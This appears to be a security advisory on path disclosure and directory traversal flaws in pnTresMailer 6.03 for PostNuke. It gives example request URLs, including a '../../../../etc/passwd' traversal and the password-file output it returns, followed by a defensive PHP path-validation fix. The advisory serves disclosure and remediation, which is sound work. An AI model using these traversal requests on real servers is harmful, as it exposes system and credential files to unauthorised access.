"pnTresMailer is an advanced Newsletter module for use with the PostNuke content management system."
pnTresMailer is vulnerable to full path disclosure and directory traversal attacks, which enable a remote user to retrieve any file.
Credit:
The information has been provided by John Cobb.
Vulnerable Systems:
* pnTresMailer version 6.03
By making an invalid request, an attacker can learn where pnTresMailer is located in the filesystem from the error message PHP returns. An example follows:
www.victimsite.com/codebrowserpntm.php?foldertohighlight=pnTresMailer&filetohighlight=w00t
Warning: highlight_file(codebrowserPnTM/pnTresMailer/w00t): failed to open
stream: No such file or directory in
/var/www/html/codebrowserpntm.php on line 130
Warning: highlight_file(): Failed opening
'codebrowserPnTM/pnTresMailer/w00t' for highlighting in
/var/www/html/codebrowserpntm.php on line 130
In addition, due to input validation bugs, or the lack of input validation altogether, it is possible to provide relative paths in certain arguments and thus retrieve system files that are otherwise inaccessible. An interesting example would be to retrieve the password file:
www.victimsite.com/codebrowserpntm.php?downloadfolder=pnTresMailer&filetodownload=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
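
Both issues above come from passing request parameters straight into a file path and letting PHP print its own warnings. The following is an added example, not code from pnTresMailer or from the original advisory: resolve_browsable() is a hypothetical helper, and the temporary directory and readme.txt file are constructed for the demonstration.

```php
<?php
// Added example, not pnTresMailer code. resolve_browsable() is a hypothetical
// helper; the directory and parameter values mirror those shown on this page.
ini_set('display_errors', '0'); // keep PHP warnings (and install paths) out of responses

/** Canonical path of $folder/$file if it is a regular file inside $base, else null. */
function resolve_browsable(string $base, string $folder, string $file): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false || strpos($folder . $file, "\0") !== false) {
        return null;
    }
    // realpath() collapses "../" sequences and symlinks; false if the path does not exist.
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $folder . DIRECTORY_SEPARATOR . $file);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base plus a trailing separator so a sibling such as
    // "<base>-old" cannot pass as being inside "<base>".
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed demo data: a throwaway base directory holding one readable file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'codebrowserPnTM_demo_' . getmypid();
mkdir($base . '/pnTresMailer', 0700, true);
file_put_contents($base . '/pnTresMailer/readme.txt', "sample\n");

$requests = [
    ['pnTresMailer', 'readme.txt'],               // legitimate file
    ['pnTresMailer', 'w00t'],                     // missing file, as in the first request above
    ['pnTresMailer', '../../../../etc/passwd'],   // relative path, as in the second request above
];
foreach ($requests as [$folder, $file]) {
    $path = resolve_browsable($base, $folder, $file);
    // Missing and out-of-base files get the same generic answer, so the
    // response reveals neither the install path nor whether the target exists.
    echo $folder, '/', $file, ' => ', $path === null ? '404 File not found' : 'served', "\n";
}

// Remove the constructed demo files.
unlink($base . '/pnTresMailer/readme.txt');
rmdir($base . '/pnTresMailer');
rmdir($base);
```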